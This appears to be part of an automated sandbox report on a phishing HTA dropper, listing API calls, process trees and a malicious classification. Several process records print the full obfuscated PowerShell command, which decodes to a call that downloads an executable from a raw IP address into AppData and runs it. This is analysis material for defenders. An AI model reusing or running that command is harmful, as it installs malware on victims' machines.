Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72F60 NtCreateProcessEx,	7_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72EA0 NtAdjustPrivilegesToken,	7_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72E80 NtReadVirtualMemory,	7_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72EE0 NtQueueApcThread,	7_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72E30 NtWriteVirtualMemory,	7_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72DB0 NtEnumerateKey,	7_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72DD0 NtDelayExecution,	7_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72D30 NtUnmapViewOfSection,	7_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72D10 NtMapViewOfSection,	7_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B73D10 NtOpenProcessToken,	7_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72D00 NtSetInformationFile,	7_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B73D70 NtOpenThread,	7_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72CA0 NtQueryInformationToken,	7_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72CF0 NtOpenProcess,	7_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72CC0 NtQueryVirtualMemory,	7_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72C00 NtQueryInformationProcess,	7_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72C70 NtFreeVirtualMemory,	7_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72C60 NtCreateKey,	7_2_03B72C60

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B1A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

6_2_00B1A1EF

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B08310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

6_2_00B08310

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

6_2_00B151BD

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADD975	6_2_00ADD975
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD21C5	6_2_00AD21C5
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE62D2	6_2_00AE62D2
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B303DA	6_2_00B303DA
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE242E	6_2_00AE242E
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD25FA	6_2_00AD25FA
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ABE6A0	6_2_00ABE6A0
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC66E1	6_2_00AC66E1
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B0E616	6_2_00B0E616
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE878F	6_2_00AE878F
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B18889	6_2_00B18889
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC8808	6_2_00AC8808
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B30857	6_2_00B30857
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE6844	6_2_00AE6844
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADCB21	6_2_00ADCB21
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE6DB6	6_2_00AE6DB6
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC6F9E	6_2_00AC6F9E
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC3030	6_2_00AC3030
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD3187	6_2_00AD3187
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADF1D9	6_2_00ADF1D9
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AB1287	6_2_00AB1287
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD1484	6_2_00AD1484
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC5520	6_2_00AC5520
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD7696	6_2_00AD7696
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC5760	6_2_00AC5760
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD1978	6_2_00AD1978
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AE9AB5	6_2_00AE9AB5
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ABFCE0	6_2_00ABFCE0
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADBDA6	6_2_00ADBDA6
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD1D90	6_2_00AD1D90
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B37DDB	6_2_00B37DDB
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AC3FE0	6_2_00AC3FE0
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ABDF00	6_2_00ABDF00
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00F72F38	6_2_00F72F38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401995	7_2_00401995
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E849	7_2_0040E849
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00410823	7_2_00410823
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E8A3	7_2_0040E8A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004010AB	7_2_004010AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004010B0	7_2_004010B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E9E9	7_2_0040E9E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401210	7_2_00401210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401A2C	7_2_00401A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00403230	7_2_00403230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401A87	7_2_00401A87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042F333	7_2_0042F333
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401C6D	7_2_00401C6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401C70	7_2_00401C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401DF0	7_2_00401DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004105FA	7_2_004105FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402659	7_2_00402659
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402660	7_2_00402660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00410603	7_2_00410603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00416F0E	7_2_00416F0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00416F13	7_2_00416F13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B8739A	7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C003E6	7_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E3F0	7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF132D	7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFA352	7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D34C	7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B452A0	7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4B1B0	7_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C001AA	7_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF81CC	7_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDA118	7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0B16B	7_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B30100	7_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B7516C	7_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC8158	7_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF70E9	7_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFF0E0	7_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF0CC	7_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFF7B0	7_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3C7C0	7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B64750	7_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5C6E0	7_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF16CC	7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDD5B0	7_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C00591	7_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40535	7_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF7571	7_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEE4F6	7_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFF43F	7_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B31460	7_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF2446	7_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5FB80	7_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB5BF0	7_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B7DBF9	7_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF6BD7	7_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFFB76	7_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFAB40	7_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDDAAC	7_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B85AA0	7_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3EA80	7_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEDAC6	7_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB3A6C	7_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFFA49	7_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF7A46	7_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B429A0	7_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0A9A6	7_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B56962	7_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B49950	7_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B950	7_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B268B8	7_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6E8F0	7_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B438E0	7_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAD800	7_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B42840	7_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4A840	7_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFFFB1	7_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41F92	7_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4CFE0	7_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B32FC8	7_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B60F30	7_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B82F28	7_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFFF09	7_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB4F40	7_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B49EB0	7_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B52E90	7_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFCE93	7_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFEEDB	7_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFEE26	7_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40E59	7_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B58DBF	7_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3ADE0	7_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5FDC0	7_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4AD00	7_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF7D73	7_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF1D5A	7_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B43D40	7_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0CB5	7_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B30CF2	7_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFFCF2	7_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB9C32	7_2_03BB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40C00	7_2_03B40C00

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 91 times
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: String function: 00AD0AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: String function: 00AD8900 appears 42 times
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: String function: 00AB7DE1 appears 36 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winHTA@14/15@0/1

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B1A06A GetLastError,FormatMessageW,

6_2_00B1A06A

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B081CB AdjustTokenPrivileges,CloseHandle,		6_2_00B081CB
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		6_2_00B087E1

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B1B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

6_2_00B1B3FB

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B2EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

6_2_00B2EE0D

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

6_2_00B283BB

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

6_2_00AB4E89

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjwt3tzc.v2e.ps1

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: seemejkiss.hta

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemejkiss.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe"
Source: C:\Users\user\AppData\Roaming\winnit.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior
